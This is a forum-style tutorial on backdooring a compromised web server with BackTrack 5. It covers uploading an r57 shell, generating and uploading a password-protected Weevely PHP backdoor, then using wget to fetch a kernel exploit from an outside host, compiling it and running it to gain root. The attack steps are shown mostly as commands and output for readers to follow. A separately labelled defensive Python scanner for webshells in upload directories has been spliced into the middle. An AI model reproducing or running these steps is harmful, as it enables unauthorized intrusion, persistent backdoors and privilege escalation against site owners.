Assalam O Alaikum All!!
Today I'm going to post a tutorial on backdooring a server via BackTrack 5.
For this you need a virtual machine with BT5 installed.
OK.. now let's start..
Assume our target site: http://target.com/
Now we have hacked the admin panel of the site via SQL injection. The site was vulnerable to SQL injection (assumption).
Admin panel: http://target.com/admin/index.php
After logging into the admin panel we have uploaded our shell (r57.php).
Shell location on server: http://target.com/uploads/r57.php
Now..
Run your VMware >> BackTrack 5...
The game starts now..
Backdooring a server with an encrypted PHP backdoor.. amazing!!
root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Where
-p = your password to access the backdoor
-g = generate a new encrypted PHP file (it doesn't actually encrypt the file; it encodes it)
-o = specify your output file
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p rustles
+ Backdoor file ‘bdoor.php’ created with password ‘rustles’.
Now go and check your desktop. There will be an encrypted PHP file, bdoor.php.
=>Firefox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>Firefox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location
Now we have to connect to our encrypted bdoor.php.
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://target.com/uploads/bdoor.php -p rustles
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Directory listing successful.
[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!
[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp
Directory pcp Successfully Created.
[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a
Linux 2.6.32 kernel (Assume)
[hacker@target.com/tmp/pcp] wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-
[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Rooted ... Enjoy!!
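Added example (not part of the original post and not Weevely's code): a defender-side scan of the uploads directory this walkthrough relies on, flagging files that look like scripts or encoded stubs regardless of their extension. The marker lists, the 4.5-bit entropy threshold and the sample files are assumptions constructed for illustration.

```python
import base64
import math
import os
import re
from collections import Counter

# Extensions a PHP-enabled server may hand to the interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Content markers: PHP open tag, command/code execution calls, decoder calls.
CHECKS = [
    ("php-open-tag", re.compile(rb"<\?php", re.I)),
    ("exec-call", re.compile(
        rb"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)\s*\(", re.I)),
    ("decoder-call", re.compile(rb"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
]
# Long unbroken base64-alphabet run: an encoded payload, not readable source.
BLOB = re.compile(rb"[A-Za-z0-9+/=]{120,}")

def entropy(data):
    """Shannon entropy in bits per byte (data must be non-empty)."""
    return -sum(c / len(data) * math.log2(c / len(data)) for c in Counter(data).values())

def score_upload(name, content):
    """Return the reasons a file found in an upload directory looks like a script."""
    reasons = ["script-extension"] if SCRIPT_EXT.search(name) else []
    reasons += [tag for tag, rx in CHECKS if rx.search(content)]
    blob = BLOB.search(content)
    if blob and entropy(blob.group()) > 4.5:  # threshold is an assumption
        reasons.append("encoded-blob")
    return reasons

def scan_tree(root):
    """Walk an uploads directory; return {relative path: reasons} for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                reasons = score_upload(fname, fh.read(1_000_000))
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

# Constructed samples: harmless stand-ins, not the output of any real tool.
SAMPLES = {
    "bdoor.php": b'<?php $k="' + base64.b64encode(bytes(range(256))) + b'"; eval(base64_decode($k)); ?>',
    "avatar.jpg": b'\xff\xd8\xff\xe0JFIF\x00<?php system("id"); ?>',
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 64,
}
```

A hit is a lead for manual review, not proof of compromise; the stronger control is serving the uploads directory with script execution disabled so that a file like bdoor.php is never interpreted.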
Special thanks to Hack All